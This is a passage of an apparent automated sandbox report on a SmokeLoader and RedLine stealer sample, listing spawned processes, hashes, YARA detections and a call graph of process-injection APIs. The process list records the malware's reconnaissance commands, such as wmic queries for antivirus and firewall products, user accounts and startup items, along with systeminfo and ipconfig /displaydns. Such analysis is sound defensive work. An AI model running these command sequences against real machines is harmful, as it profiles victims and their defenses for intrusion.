                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 34%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:10:01:55
                                                                      Start date:25/09/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\E647.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\E647.exe
                                                                      Imagebase:0x400000
                                                                      File size:417'280 bytes
                                                                      MD5 hash:1A29ED2D1AE240EC1D6F50DCC960BAA3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2603297963.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:10:02:19
                                                                      Start date:25/09/2024
                                                                      Path:C:\Users\user\AppData\Roaming\uejbbri
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\uejbbri
                                                                      Imagebase:0x400000
                                                                      File size:417'280 bytes
                                                                      MD5 hash:1A29ED2D1AE240EC1D6F50DCC960BAA3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2843112467.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:10:02:27
                                                                      Start date:25/09/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\B575.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\B575.exe
                                                                      Imagebase:0x7ff7cb870000
                                                                      File size:78'336 bytes
                                                                      MD5 hash:12AD2C78F5EB326820444DCFE9DFA683
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:10:02:28
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0x940000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:10:02:28
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                      Imagebase:0x7ff624250000
                                                                      File size:69'632 bytes
                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:11
                                                                      Start time:10:02:29
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff674740000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:10:02:30
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0x940000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:13
                                                                      Start time:10:02:32
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff674740000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:14
                                                                      Start time:10:02:32
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd
                                                                      Imagebase:0x7ff643210000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:15
                                                                      Start time:10:02:32
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:16
                                                                      Start time:10:02:33
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                      Imagebase:0x940000
                                                                      File size:4'514'184 bytes
                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:17
                                                                      Start time:10:02:33
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:18
                                                                      Start time:10:02:34
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\explorer.exe
                                                                      Imagebase:0x7ff674740000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:19
                                                                      Start time:10:02:35
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:20
                                                                      Start time:10:02:37
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:21
                                                                      Start time:10:02:39
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:22
                                                                      Start time:10:02:40
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:23
                                                                      Start time:10:02:45
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:24
                                                                      Start time:10:02:47
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:25
                                                                      Start time:10:02:49
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:26
                                                                      Start time:10:02:52
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:27
                                                                      Start time:10:02:57
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:28
                                                                      Start time:10:02:59
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:29
                                                                      Start time:10:03:01
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:30
                                                                      Start time:10:03:04
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:31
                                                                      Start time:10:03:07
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                      Imagebase:0x7ff7eb220000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:32
                                                                      Start time:10:03:10
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:ipconfig /displaydns
                                                                      Imagebase:0x7ff7e6180000
                                                                      File size:35'840 bytes
                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:33
                                                                      Start time:10:03:11
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\ROUTE.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:route print
                                                                      Imagebase:0x7ff67dbd0000
                                                                      File size:24'576 bytes
                                                                      MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:34
                                                                      Start time:10:03:12
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh firewall show state
                                                                      Imagebase:0x7ff733e80000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:35
                                                                      Start time:10:03:13
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:systeminfo
                                                                      Imagebase:0x7ff7e1830000
                                                                      File size:110'080 bytes
                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:37
                                                                      Start time:10:03:17
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:tasklist /v /fo csv
                                                                      Imagebase:0x7ff6e0b20000
                                                                      File size:106'496 bytes
                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:7.4%
                                                                        Dynamic/Decrypted Code Coverage:42.6%
                                                                        Signature Coverage:43.4%
                                                                        Total number of Nodes:122
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 3511 402e40 3513 402e37 3511->3513 3514 402edf 3513->3514 3515 4018e6 3513->3515 3516 4018f5 3515->3516 3517 40192e Sleep 3516->3517 3518 401949 3517->3518 3520 40195a 3518->3520 3521 401514 3518->3521 3520->3514 3522 401524 3521->3522 3523 4016e0 3522->3523 3524 4015c4 NtDuplicateObject 3522->3524 3523->3520 3524->3523 3525 4015e1 NtCreateSection 3524->3525 3526 401661 NtCreateSection 3525->3526 3527 401607 NtMapViewOfSection 3525->3527 3526->3523 3529 40168d 3526->3529 3527->3526 3528 40162a NtMapViewOfSection 3527->3528 3528->3526 3530 401648 3528->3530 3529->3523 3531 401697 NtMapViewOfSection 3529->3531 3530->3526 3531->3523 3532 4016be NtMapViewOfSection 3531->3532 3532->3523 3575 2600001 3576 2600005 3575->3576 3581 260092b GetPEB 3576->3581 3578 2600030 3583 260003c 3578->3583 3582 2600972 3581->3582 3582->3578 3584 2600049 3583->3584 3585 2600e0f 2 API calls 3584->3585 3586 2600223 3585->3586 3587 2600d90 GetPEB 3586->3587 3588 2600238 VirtualAlloc 3587->3588 3589 2600265 3588->3589 3590 26002ce VirtualProtect 3589->3590 3592 260030b 3590->3592 3591 2600439 VirtualFree 3595 26004be LoadLibraryA 3591->3595 3592->3591 3594 26008c7 3595->3594 3628 401542 3629 40153b 3628->3629 3630 4015c4 NtDuplicateObject 3629->3630 3639 4016e0 3629->3639 3631 4015e1 NtCreateSection 3630->3631 3630->3639 3632 401661 NtCreateSection 3631->3632 3633 401607 NtMapViewOfSection 3631->3633 3635 40168d 3632->3635 3632->3639 3633->3632 3634 40162a NtMapViewOfSection 3633->3634 3634->3632 3636 401648 3634->3636 3637 401697 NtMapViewOfSection 3635->3637 3635->3639 3636->3632 3638 4016be NtMapViewOfSection 3637->3638 3637->3639 3638->3639 3596 2600005 3597 260092b GetPEB 3596->3597 3598 2600030 3597->3598 3599 260003c 7 API calls 3598->3599 3600 2600038 3599->3600 3537 266f18e 3538 266f19d 3537->3538 3541 266f92e 3538->3541 3542 266f949 3541->3542 3543 266f952 CreateToolhelp32Snapshot 3542->3543 3544 266f96e Module32First 3542->3544 3543->3542 3543->3544 3545 266f97d 3544->3545 3547 266f1a6 3544->3547 3548 266f5ed 3545->3548 3549 266f618 3548->3549 3550 266f661 3549->3550 3551 266f629 VirtualAlloc 3549->3551 3550->3550 3551->3550 3691 402dd0 3692 402ddc 3691->3692 3693 4018e6 8 API calls 3692->3693 3694 402edf 3692->3694 3693->3694 3609 4018f1 3610 4018f6 3609->3610 3611 40192e Sleep 3610->3611 3612 401949 3611->3612 3613 401514 7 API calls 3612->3613 3614 40195a 3612->3614 3613->3614 3678 401915 3679 4018c6 3678->3679 3680 40191a 3678->3680 3681 40192e Sleep 3680->3681 3682 401949 3681->3682 3683 401514 7 API calls 3682->3683 3684 40195a 3682->3684 3683->3684 3533 402f97 3534 4030ee 3533->3534 3535 402fc1 3533->3535 3535->3534 3536 40307c RtlCreateUserThread NtTerminateProcess 3535->3536 3536->3534 3664 266f17d 3665 266f19d 3664->3665 3666 266f92e 3 API calls 3665->3666 3667 266f1a6 3666->3667 3668 402d7b 3669 402d38 3668->3669 3669->3668 3670 4018e6 8 API calls 3669->3670 3671 402dc7 3669->3671 3670->3671 3552 260003c 3553 2600049 3552->3553 3565 2600e0f SetErrorMode SetErrorMode 3553->3565 3558 2600265 3559 26002ce VirtualProtect 3558->3559 3561 260030b 3559->3561 3560 2600439 VirtualFree 3564 26004be LoadLibraryA 3560->3564 3561->3560 3563 26008c7 3564->3563 3566 2600223 3565->3566 3567 2600d90 3566->3567 3568 2600dad 3567->3568 3569 2600dbb GetPEB 3568->3569 3570 2600238 VirtualAlloc 3568->3570 3569->3570 3570->3558 3615 4014fe 3616 401506 3615->3616 3617 401531 3615->3617 3618 4015c4 NtDuplicateObject 3617->3618 3627 4016e0 3617->3627 3619 4015e1 NtCreateSection 3618->3619 3618->3627 3620 401661 NtCreateSection 3619->3620 3621 401607 NtMapViewOfSection 3619->3621 3623 40168d 3620->3623 3620->3627 3621->3620 3622 40162a NtMapViewOfSection 3621->3622 3622->3620 3624 401648 3622->3624 3625 401697 NtMapViewOfSection 3623->3625 3623->3627 3624->3620 3626 4016be NtMapViewOfSection 3625->3626 3625->3627 3626->3627

                                                                        Executed Functions

                                                                        Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 111 4018c5 104->111 112 4018bc-4018e3 call 401193 104->112 105->106 115 4015c4-4015db NtDuplicateObject 105->115 106->104 111->112 115->106 117 4015e1-401605 NtCreateSection 115->117 118 401661-401687 NtCreateSection 117->118 119 401607-401628 NtMapViewOfSection 117->119 118->106 123 40168d-401691 118->123 119->118 122 40162a-401646 NtMapViewOfSection 119->122 122->118 125 401648-40165e 122->125 123->106 126 401697-4016b8 NtMapViewOfSection 123->126 125->118 126->106 128 4016be-4016da NtMapViewOfSection 126->128 128->106 130 4016e0 call 4016e5 128->130
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                        • Opcode Fuzzy Hash: 746464f9963faf83baa7a7e4d1d503d9951592239326ed203a5fdafee77b7e4e
                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                        Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
